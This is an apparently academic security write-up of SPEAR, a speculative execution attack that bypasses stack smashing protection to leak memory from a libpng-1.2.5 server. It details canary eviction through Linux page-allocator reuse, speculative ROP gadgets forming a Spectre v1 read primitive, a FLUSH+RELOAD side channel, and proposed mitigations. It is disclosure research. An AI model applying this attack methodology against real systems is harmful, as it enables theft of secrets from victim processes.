SPEAR attacks - stack smashing protector bypass usecase

Authors: Alexandra, Andrea, Alessandro, Anil

Topics: security, transient-execution

Bypassing stack smashing protection through speculative control flow hijacking #

This work demonstrates a local arbitrary read attack through speculative control flow hijacking against an image processing server. The victim uses libpng-1.2.5 which is vulnerable to CVE-2004-05971, a stack buffer overflow vulnerability. Traditional exploitation is blocked when the library is built with stack smashing protection (SSP). However, not only SSP does not protect against speculative control flow hijacking, but it also provides primitives which facilitate the end-to-end attack.

Alongside the SSP speculative control flow hijacking attack, our extended work encompasses an entire class of attacks which we refer to as SPEculative ARchitectural control flow hijacks, or SPEAR. Based on the SPEAR classification, the SSP attack falls under the speculative control flow hijacking based on an architectural overwrite of a backward edge category.

Extended work

Background: bypassing stack smashing protection #

SSP is a mitigation against traditional stack buffer overflow attacks. Its design is simple: in each function prologue, write a randomly generated value (canary) on the stack before the area allocated for local variables. Unless the attacker has the ability to leak the canary value prior to the attack, a linear stack buffer overflow exploit fails because the function epilogue checks the integrity of the canary and will crash the program if the check fails.

Nonetheless, the SSP mechanism does not prevent an attacker from running the exploit speculatively when the canary integrity check mispredicts the outcome. To understand why stack smashing protection is subject to a Spectre attack, we show the SSP code generated by GCC and Clang.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
func:
    prologue

; Store canary on the stack
    mov rbx, QWORD[fs:0x28]
    mov QWORD[stack_canary], rbx
    ...
    body
    ...
; Check for corrupted canary, if yes fail
    mov rbx, QWORD[stack_canary]
    xor QWORD[fs:0x28], rbx
    je exit
    call __stack_chk_fail
exit:
    epilogue
    ret

In the above snippet, the outcome of the xor instruction sets the appropriate flags subsequently used by the conditional jump instruction to decide on aborting or returning to the caller. A misprediction of that conditional branch when a buffer overflow did occur leads to speculative execution of instructions at the overwritten return address.

Background: from theoretical to practical Spectre #

We analyze the preconditions required for a successful Spectre attack and describe ways of achieving them in a real world environment, against a real world target, unlike existing PoC attacks against Spectre-type vulnerabilities which employ artificial methods to overcome these conditions. We identify three attack preconditions:

  1. large enough speculation window: the attacker will typically achieve this by evicting data required to determine the outcome of the conditional branch. The attacker must thus be able to evict arbitrary victim data from all cache levels (achieved in synthetic PoCs via the clflush or similar instructions)
  2. the availability of an arbitrary read primitive; it must be part of victim’s code and must execute inside the speculation window (synthetic PoCs usually compile the primitive together with the victim code)
  3. a reliable side-channel; the most common choice is the CPU cache, whose state is changed by the arbitrary read primitive in such way that the attacker can later read the signal (the least noisy option often used in synthetic PoCs is a shared memory area between attacker and victim)

These preconditions apply to all Spectre-type attacks, including SPEAR.

We discuss our solutions for each precondition in Exploit strategy. Before discussing the strategy, the next section describes the stack buffer overflow vulnerability which is exploited by this attack through speculative SSP bypass.

libpng-1.2.5: stack buffer overflow #

The stack buffer overflow vulnerability that we picked is shown below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void /* PRIVATE */
png_handle_tRNS(png_structp png_ptr, png_infop info_ptr, png_uint_32 length)
{
  ...
  png_byte readbuf[PNG_MAX_PALETTE_LENGTH];
  ...
  if (png_ptr->color_type == PNG_COLOR_TYPE_PALETTE) {
    if (!(png_ptr->mode & PNG_HAVE_PLTE))
    {
     /* Should be an error, but we can cope with it */
     png_warning(png_ptr, "Missing PLTE before tRNS");
    }
    ...
    png_crc_read(png_ptr, readbuf, (png_size_t)length);
    png_ptr->num_trans = (png_uint_16)length;
  }
  ...
}

The png_handle_tRNS (handling of transparency chunk) function allocates a stack buffer and fills it with attacker-controlled data. The number of bytes copied to the stack buffer is determined by the length parameter, which is also attacker controlled. As shown in the snippet, in the isolated case when no PLTE (the palette chunk) was found before calling png_handle_tRNS, the length check against maximum stack buffer size is missing, therefore allowing the attacker to write enough payload beyond the buffer limit (>2000B).

This vulnerability is not exploitable when the library is compiled with SSP. Such attempt results in program abort due to canary mismatch, thwarting the attack.

Exploit strategy #

We make use of the speculative window between canary integrity check misprediction and program abort to speculatively run the attacker controlled payload, bypassing the memory corruption exploitation barrier imposed by SSP.

We run an end-to-end exploit against the SSP-protected stack buffer overflow in png_handle_tRNS. Unlike traditional exploits where the attacker crafts the right payload and sends it to the victim, here we isolate the following attack preconditions:

  1. The CPU must mispredict on stack canary integrity check
  2. Large speculation window (by stack canary eviction from all cache levels before png_handle_tRNS canary check)

For the first precondition, we rely on PHT training using a simple yet effective approach. Prior to the attack, we repeatedly send the victim correct PNG files to parse so that the CPU speculative behaviour takes the “correct canary” path rather than the “hijacked canary” path.

For the second precondition, we exploit the kernel page frame allocation mechanism such that it gives the victim a former attacker-controlled page frame to place its canary. Prior to the attack, we find the correct eviction sets for that page using FLUSH+RELOAD. The outcome of this method is a successful stack canary eviction using precomputed eviction sets.

Building the arbitrary read primitive #

Assuming we already have a long enough speculation window to run the attack payload, the next challenge is to find an arbitrary read primitive. We choose to disclose victim data through the cache side-channel. To place the victim data in the cache (side-channel send), the attacker tricks the victim into speculatively running a Spectre v1-type gadget. Subsequently, the attacker obtains the victim data from cache (side-channel receive) by probing the shared memory area for cached data.

Spectre v1 gadgets are scarce, but they are simple enough to be built by chaining together ROP gadgets. At a high level, the Spectre v1 gadget performs an array access. The array size is usually 256 so that it covers all byte values. The size of each array entry is 256B2. The low level code for the Spectre v1 gadget is shown below.

1
2
3
4
5
6
7
8
9
; Place array and index in registers
mov rax, [base_loc]
mov rdx, [index_loc]
; Multiply with 256
shl rdx, 8
; Compute final address
add rax, rdx
; Array element access
mov rsi, [rax]

Given the reduced complexity of this gadget, we found the ROP gadget building blocks of Spectre v1 in different setups with different success rates. The code sources include system libraries (libc, libpthread, libpng). We detail the ROP gadget restrictions imposed by speculative execution in Speculative ROP.

Exploit summary #

initial-scheme

The above scheme shows an overview of the steps required to perform the end-to-end attack. The attack has a preparation phase (Steps 1 and 2), where eviction sets (to ensure the existence of a suitably long speculation window) are identified, memory used by the side channel is flushed and ROP gadgets are primed in the instruction cache. The attacker then submits the payload to the victim in Step 3, crafted to exploit the stack buffer overflow. Traditional exploitation of the memory safety violation is prevented by SSP. However, the attacker uses a speculative execution attack to bypass the mechanism by overwriting the return address, and obtaining a speculative control flow hijack (Step 5). As a result, the victim is tricked into executing a side-channel send of attacker-chosen memory in Step 6: this is achieved with the ROP component, which reuses code snippets from the victim program, appropriately selected and primed in the initialisation phase. The attacker can then execute the corresponding side-channel receive in Step 7. The success rate of the attack is increased by concurrently executing an eviction loop to lengthen the speculation window (Step 4) with previously computed eviction sets for the stack canary.

Stack canary eviction #

The first step of the attack is finding the correct eviction sets for victim stack canary. The sets are subsequently used during the eviction loop in Step 4, contributing to the SPEAR + ROP attack phases executed in Step 5 and Step 6. The victim stack canary eviction causes a cache miss during the canary value load when the execution reaches the canary integrity check, thus giving the attacker a large enough speculation window for the SPEAR (SPEculative ARchitectural control flow hijacking) attack.

To address canary eviction, we came up with a novel approach of evicting victim data for existing methods incur high penalty on the ROP execution (Step6) success. Our method has the advantage of being non-intrusive and noise-free compared with state-of-art cache eviction solutions. We optimized the number of cache sets touched in Step 4 to be the bare minimum, namely a single cache set in each slice (8 cache sets in total)3, therefore limiting the chances of accidentally evicting attack-crucial data, like ROP gadgets, as well as the side-channel send signal.

The stack canary eviction consists of three phases. The first phase corresponds to Step 1, finding the eviction set for the canary and is achieved in a preparatory phase of the attack (the victim instance that we target did not start yet). We use two different processes for the attack, A1 and A2 which can communicate through some channel (we picked shared memory). A2 is compiled with SSP. The A2 canary eviction set detection loop runs synchronously in A1 and A2. The former sequentially loads each possible LLC eviction set concurrently with the latter performing FLUSH+RELOAD on its canary. For exactly one eviction set, A2 encounters a cache miss and reports it to A1. As a result, A1 obtains the LLC eviction set corresponding to A2’s canary location4.

The rest of the canary eviction method is based on the observation that the page frame used to store A2’s canary, the TLS page5, can be subsequently used by other processes in the system, in some cases for the same purpose.

The second phase of canary eviction forces A2’s TLS page to be reused by the target victim instance. Due to the deterministic behaviour of the Linux page allocator, the attacker can rely on page reuse with 100% success rate when the victim process is exec'd by an attacker-controlled process6.

Abusing the Linux page allocator #

The TLS page reuse is a crucial part of the attack since it facilitates non-intrusive canary value eviction during the attack. We came up with this method after understanding how process loading requests resources from the operating system (OS), namely page frames. We observed during our experiments that sometimes identical Page Frame Numbers (PFNs) show up across independent process runs. We characterized the OS page frame handling by in-depth analysis of allocation and deallocation during process startup and exit. We first discuss page frame deallocation so that we can draw conclusions about the blocks of free pages managed by the allocator. Subsequently, we show how page frames are retrieved from the blocks of free pages during an allocation request. The blocks of free pages correspond to an internal kernel structure - an array of linked lists organized by block size (power of two number of pages). Each linked list is referred to as n-order free list, where n is the exponent for the power of two sized block7. In this attack it suffices to manipulate the 0-order free list.

Page frame deallocation happens when a process drops a part (madvise, munmap) or releases its entire virtual memory (exec, exit). The deallocation order in the latter case is decided by unmap_vmas8. Page frames are released in ascending order, based on their corresponding virtual address. This also applies for the former case, although the order in which the memory chunks drop happens contributes to the free lists layout.

The final order in which page frames are placed in the free list is descending because of the subsequent LIFO (Last In, First Out) release from TLB (Translation Lookaside Buffer).

Knowing the deallocator behaviour, we craft the attacker virtual memory space in such a way that the target TLS page lands on a fixed location in the 0-order free list after attacker memory deallocation. We refer to the fixed location index in the 0-order freelist as K. K is chosen such that during victim’s process memory request for the TLS page frame, the 0-order free list Kth node is the attacker-controlled page frame. Prior to the attack, K’s value is determined by tracing victim allocations in a simulated attack, by starting the victim binary under perf and recording all page frame allocations and deallocations9.

In the case of TLS page, we were able to reuse the attacker page in every attempt. This is not true for any page a program allocates: for example, the success rate drops when the target page is among the first pages claimed by the loader or when the target page is requested after victim memory deallocations.

Wrapping up canary eviction #

We demonstrate the attack against an attacker-spawned (exec’d) victim because this setup allows full control over victim startup, subsequently to placing the attacker-controlled page in the right 0-order free list spot.

We start the target victim by placing it inside the running context of the attacker controlled process A2, with execv. Prior to this, A2 performs the necessary amount of page-sized allocations corresponding to K’s value, to achieve TLS page reuse after execv. The syscall drops the full memory layout of the running process (A2) and replaces it with the memory layout of the victim, but in such way that the corresponding physical memory pages assigned by the OS are returned in the attacker desired order. Our method guarantees that the TLS page which contained the canary value of A2 now contains the canary value of the target victim, therefore A1 can evict the victim canary value (Step 4) by loading the eviction sets computed in Step 1.

Speculative ROP #

The canary eviction ensures a long enough speculation window inside of which we run the attack payload (Step 6). The payload is composed of carefully chosen ROP gadgets which are prepared as part of the initialization in Step 1.

Spectre v1 side-channel send gadget #

We briefly mentioned in the background section that the main purpose of the payload is to leak arbitrary victim data. The arbitrary read primitive used by this attack is the Spectre v1-type gadget built by chaining together ROP gadgets, since the victim memory space does not provide a ready-to-use one.

The Spectre v1 gadget is essentially an array access where array_base and scale are fixed. The variable is array_index which represents the value of one victim secret byte. Thus, the ROP chain purpose is to:

  1. Compute array address
1
2
mov array_index, [victim_secret_address]
address = array_base + scale x array_index
  1. Load address contents to transmit the side-channel send signal
1
mov reg, [address]

For computing the Spectre v1 array address, we look for two

1
pop reg; ret;

gadgets which place victim_secret_address and array_base in registers. We make the assumption that both addresses are known10, therefore they can be popped from the stack and used for subsequent computations. Next step is victim_secret_address dereference to obtain array_index achieved with a register dereference gadget

1
mov reg0, [reg1]; ret;

The next gadget is an arithmetic or logic operation used to multiply array_index with scale. The most commonly encountered variant is:

1
shl reg0, 8; ret;

Lastly, we need another register/address dereference to achieve side-channel send.

We found different working versions of the ROP chain in different libraries including libc, libpthread and libpng. For the exact ROP gadgets we use for the PoC, please refer to our paper.

Constraints #

Traditionally, code reuse attacks can use gadgets from any executable page which is mapped in memory, independent of the runtime state of the page. However, for a ROP gadget to successfully execute speculatively, the gadget must reside in a virtual page with a valid TLB mapping. Moreover, an icache miss shortens the speculative window for the subsequent ROP gadgets, therefore a cached gadget increases the side-channel send success.

To address the first constraint, we built a speculative ROP gadget finding tool based on ROPgadget. The purpose of the tool is to determine all code pages which were physically mapped during runtime and reduce the ROP gadget search space to those pages. To achieve this, we simulate the attack against the victim inside gdb and collect the execution traces. The traces help finding the code pages which have a corresponding TLB mapping by the time of the attack11. We restrict ROPGadget to search for gadgets only in the code pages previously found.

The second constraint which concerns the cached ROP chain is handled in Step 2, by the ROP initialization phase. Subsequently, after Step 3 (sending payload), the attacker starts a process, co-located with the victim, which accesses the ROP chain in a loop to ensure a low number of icache misses during speculative ROP.

Speculative ROP is a powerful tool to have in speculative execution attacks. As proof, we achieved arbitrary read with only 6 gadgets. However, speculative ROP is not trivial to set up due to the constraints detailed above (TLB/icache misses effects on speculative window size). Moreover, any slight change in the environment may compromise the attack success (unlike traditional ROP where similar gadgets can be found in different setups).

The side channel #

In the previous section we discussed about sending side channel signals through speculative ROP. Regarding the channel, the attack uses the de-facto option in speculative execution attacks, namely the FLUSH+RELOAD cache side-channel, although other side-channels would work as well. The cache side-channel can use any shared memory region between attacker and victim as side channel array (e.g. any dynamic library used by the victim program). The constraints for the shared space are: the size (at least 64KB) and noise source - the attacker may prefer a shared library which is not accessed in close time proximity with the attack. For convenience, in this attack, we chose libpthread as side-channel array.

The side-channel array is primed by the attacker immediately after Step 3 by flushing all array elements from all cache levels. In Step 7, the attacker probes the array to read the side-channel signal sent by speculative ROP. The result is one victim secret byte leaked.

The arbitrary read primitive provided by SPEAR allows leaking one byte from an arbitrary victim memory address per attack run. In real world scenarios, adversaries need more than one byte to take over accounts or escalate privileges, thus we measured the effectiveness of the attack on leaking a 2-digits sized secret bytes sequence. Due to various noise sources, the success rate of the attack is 7.19% +- 0.62 (mean over 100 runs with 95% confidence interval), thus we take between 10 and 100 samples per secret byte. In this setup, we achieve an end-to-end leakage rate of 0.3 bytes per second.

Mitigations #

This attack works on Linux machines will all system-level Spectre mitigations enabled. The SPEAR class of attacks is not affected by Spectre v2 mitigations. Since SPEAR leverages the branches which test for memory integrity, mitigations must be applied at application level. We thus benchmark two possible mitigations: one based on lfence and one based on sensitive metadata (e.g. array index, return address, forward edge) masking. The lfence mitigation incurs high overhead (highest recorded being 100%) and, although endorsed by other research work, we suggest using the alternative. The masking based mitigation overhead is still not negligible, yet it did not exceed 13% in our benchmarks. The benchmarks together with benchmarking methods and platforms are presented in detail in the paper.

One important aspect of the mitigations we propose against SPEAR is that they protect none but the application code which asserts memory integrity. In the case of SSP, the mitigations target the canary integrity check executed before each function prologue. We conclude that SPEAR attacks can be obstructed without comprehensive mitigations against Spectre v1, therefore reducing the performance penalty.

Conclusion #

We investigated architectural speculative control flow hijacking (SPEAR variant) which exploits and bypasses the stack smashing protection mitigation against classic buffer overflow exploitation to leak information from a local victim. Moreover, we demonstrated a practical attack against SSP, a mechanism which is supposed to protect software against flaws exploitability, drawing the conclusion that existing mitigations are incomplete in the Spectre era.

Together with SSP, we investigated memory safe languages (Go, Rust), Clang CFI and GCC VTV. Apart from Clang CFI, all mentioned mechanisms are feasible SPEAR targets, due to potential security critical integrity checks misprediction. We propose a low overhead mitigation against SPEAR which masks sensitive metadata (array index, return address, forward edge) prior to integrity check, hindering SPEAR effects when misprediction occurs.

For more information about SPEAR attacks, please refer to our paper.

Endnotes #

  1. We chose this particular CVE because it provides a large enough out-of-bounds write to fit the attack payload. In practice the stack buffer overflow must allow overwrite of the return address which is sufficient for stack pivoting. 

  2. In the original Spectre paper, each element size is equal to PAGE_SIZE, to avoid probing noise. The noise source comes from adjacent cache lines being fetched together with the requested line. We experimented with different element sizes until we reached 256B which is low wrt probing noise and at the same time keeps the probing area relatively small (16 pages). 

  3. Cache internals are not subject of this post, however it is important to describe the cache configuration of the experiments machine. The LLC (Last Level Cache) is 8MB in size. The CPU has 4 physical cores, therefore 8 virtual. As latest research claims and our experiments confirm, the number of corresponding LLC slices is 8. 

  4. LLC organization is based on the physical memory location of data. 

  5. The TLS page is allocated at load time by _dl_allocate_tls_storage as part of the SSP initialization. The page allocation is followed by generation of canary value by _dl_setup_stack_chk_guard

  6. For completeness, we analyzed both attacker-controlled and independent victim startup scenarios. Apart from the attacker exec’d victim (attacker controlled), we characterised page reuse when: a) the victim process is a child of an attacker-controlled process; b) the victim process is independent. The attacker-controlled victim startup results in 100% success rate for the TLS page reuse if the attacker process can manipulate its runtime virtual memory space via mmap. Forcing a page reuse in an independent process in the system (b)) depends on the attacker’s ability to track victim’s allocations. In Linux, the default behaviour allows monitoring (via /proc) the resident memory size of other processes with a granularity of 66 pages12

  7. For more on Linux allocator internals go here

  8. The call stack which leads to unmap_vmas depends on the initial action (exit, execv, munmap, madvise) of the userspace process. 

  9. We obtained the call stacks by catching memory allocator events (mm_page_alloc, mm_page_free) using perf

  10. ASLR (Address Space Layout Randomization) bypass is not covered by this work so we consider ASLR disabled. For a discussion on this matter, please refer to the paper

  11. The TLB is subject to replacement policies, thus not all pages returned by the tool have a valid TLB entry. We may end up with false positives, though the TLB size allows enough ROP gadget search space to build the Spectre v1 gadget. 

  12. Linux asynchronously updates the resident set size (RSS) via sync_mm_rss when enough events (page faults) occurred. The number of events chosen is 64 (TASK_RSS_EVENTS_THRESH), however, the RSS monitoring granularity found by our experiments is 66. The code checks if the counter is > 64, meaning that 65 events already happened. Next, the counter is incremented to count the current event (=>66). Lastly, sync_mm_rss is called. 

Cite this article